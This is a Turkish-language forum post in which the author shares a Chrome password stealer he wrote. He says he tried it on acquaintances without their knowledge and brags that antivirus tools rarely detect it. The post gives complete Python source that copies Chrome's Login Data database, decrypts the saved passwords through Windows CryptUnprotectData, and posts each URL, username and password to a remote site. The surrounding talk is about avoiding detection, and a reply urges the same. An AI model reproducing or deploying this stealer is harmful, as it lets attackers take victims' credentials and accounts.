Arkadaşlar öncelikle bu ilk konum hatta yeni üyeyim herpinize merhaba.
Neden 'Acil' yazdım derseniz bu benim yazdıgım bir virüstü aslında daha çok tepki için yapmıştım ama sonradan büyüdü ve bu hale geldi herneyse asıl acil yazma nedenim virüsün :diablo'THOR APT Scanner':diablo tarafından bulunmasından kaynaklanıyor.
Şimdi virüsün çalışma mantıgını ve özelliklerini anlatayım.
1.Powered By
2.Hızlı
3.Hala virustotal'de bulunması 10 \ 61
Mantığı İse Şöyle
Chrome bütün bilgileriniz sqlite veritabanlarında tutar bunlar şifrelidir fakat kırması base64 gibi kolaydır(kırmak win32crypt kullanılır) ben bunları kendi siteme yönlendiren bir kod yazdım buda alınan bütün şifrelerj bana gönderiyordu(Sadece belirli 'TANIDIK' kişilerde denedim fakat bir şekilde bulundu virüsüm büyük ihtimalle tanıdıklarımın pc'lerindeki virüs programları gönderdi.)
Evet arkadaşlar gördügünüz üzere çok kolay bu programı kendi buldugum bir yöntemle şifreledim onda bulunma oranı daha düşük eger oda patlarsa(patlamaya yakın zamanda) yayınlarım ama eğer patlamas ise kalır umarım begenirsiniz dedigim gibi buradaki ilk konum hatam olduysa kusura bakmayın kendinize iyi bakın.
!!DİKKAT!! Bu virus yüzünden başınıza gelebilecek sorumlulugu üstlenmiyor ve bütün yaptıklarınız kendi sorumlulugunuzdur.
Neden 'Acil' yazdım derseniz bu benim yazdıgım bir virüstü aslında daha çok tepki için yapmıştım ama sonradan büyüdü ve bu hale geldi herneyse asıl acil yazma nedenim virüsün :diablo'THOR APT Scanner':diablo tarafından bulunmasından kaynaklanıyor.
Şimdi virüsün çalışma mantıgını ve özelliklerini anlatayım.
1.Powered By
2.Hızlı
3.Hala virustotal'de bulunması 10 \ 61
Mantığı İse Şöyle
Chrome bütün bilgileriniz sqlite veritabanlarında tutar bunlar şifrelidir fakat kırması base64 gibi kolaydır(kırmak win32crypt kullanılır) ben bunları kendi siteme yönlendiren bir kod yazdım buda alınan bütün şifrelerj bana gönderiyordu(Sadece belirli 'TANIDIK' kişilerde denedim fakat bir şekilde bulundu virüsüm büyük ihtimalle tanıdıklarımın pc'lerindeki virüs programları gönderdi.)
Kod:
# -*- coding: utf-8 -*-
__author__ = "XEON"
__credits__ = ["XEON"]
import sqlite3 #veritabanı baglantısını saglayacak
import win32crypt #şifreli verileri kıracak
from shutil import copy2 #veritabanarı chrome açıkken kitli olurlar o yüzden kopyalayıp okuyoruz dosyayı
from os import getenv # %appdata% gibi kısayolları okuyabilmek için kodda LOCALAPPDATA yı aktardım
from tempfile import gettempdir #Temp kalsörünü almak için getenv çalışmadı
from requests import post #aldıgım verileri siteme submitlemek için
output="" #çıktıları biriktirmek için
#Veritabanlarını kopyalıyoruz
def copy():
copy2(getenv("LOCALAPPDATA")+"\\Google\\Chrome\\User Data\\Default\\Login Data", gettempdir() + "\\undefined0")
#veritabanlarını kopyaladımız konumdan giriş bilgilerini okuyup output degişkenine dolduruyoruz
def getlogindatas():
global output
conn = sqlite3.connect(gettempdir() + "\\undefined0")
cursor = conn.execute("SELECT password_value, username_value,origin_url FROM logins;")
for row in cursor:
output = output + "URL: " + str(row[2]) + " Username: " + str(row[1]) + " Password: " + str(win32crypt.CryptUnprotectData(row[0])[1]) + "\n"
conn.close()
#alınan output sitenize gönderilir url kısmı bildigimiz url, datafield kısmı ise postlanacak verinin hangi form alanı olarak gönderilecigi
def postsite(url, datafield):
global output
post(url, data = {datafield: str(output)})
#dosyayı kopyalamasını eger kopyalayamassa programı kapatması söylüyorum çünkü buna ya yetersiz yetki sebep olur yada chrome kurulu olmaması
try:copy()
except:
exit()
#giriş bilgilerini al yapamazsa devam etsin belki önceki aşamalarda birkaç bilgi depolamisitir.
try:getlogindatas()
except:pass
#eger output degişkeni boş degil ise gönder eger boş ise programı kapat
if output != "":
postsite("http://siteniz.com", "parolaalani")
else:
exit()Evet arkadaşlar gördügünüz üzere çok kolay bu programı kendi buldugum bir yöntemle şifreledim onda bulunma oranı daha düşük eger oda patlarsa(patlamaya yakın zamanda) yayınlarım ama eğer patlamas ise kalır umarım begenirsiniz dedigim gibi buradaki ilk konum hatam olduysa kusura bakmayın kendinize iyi bakın.
!!DİKKAT!! Bu virus yüzünden başınıza gelebilecek sorumlulugu üstlenmiyor ve bütün yaptıklarınız kendi sorumlulugunuzdur.
Moderatör tarafında düzenlendi:
sağlam bir virüs bulunmaması içinde çalış bulunmasın 
